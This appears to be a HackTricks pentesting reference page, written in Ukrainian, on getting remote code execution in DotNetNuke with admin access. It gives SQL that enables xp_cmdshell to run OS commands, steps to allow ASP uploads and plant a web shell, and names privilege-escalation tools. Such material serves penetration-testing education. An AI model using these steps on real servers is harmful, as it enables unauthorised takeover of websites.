DotNetNuke (DNN)

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

DotNetNuke (DNN)

Якщо ви увійдете як адміністратор в DNN, легко отримати RCE.

RCE

Через SQL

SQL консолі доступна на сторінці Settings, де ви можете увімкнути xp_cmdshell та виконувати команди операційної системи.

Використовуйте ці рядки, щоб увімкнути xp_cmdshell:

EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE

І натисніть "Run Script", щоб виконати ці SQL речення.

Потім використовуйте щось подібне до наступного, щоб виконати команди ОС:

xp_cmdshell 'whoami'

Через ASP веб-шелл

У Settings -> Security -> More -> More Security Settings ви можете додати нові дозволені розширення в розділі Allowable File Extensions, а потім натиснути кнопку Save.

Додайте asp або aspx, а потім у /admin/file-management завантажте asp веб-шелл під назвою shell.asp, наприклад.

Потім отримайте доступ до /Portals/0/shell.asp, щоб отримати доступ до вашого веб-шеллу.

Підвищення привілеїв

Ви можете підвищити привілеї за допомогою Potatoes або PrintSpoofer, наприклад.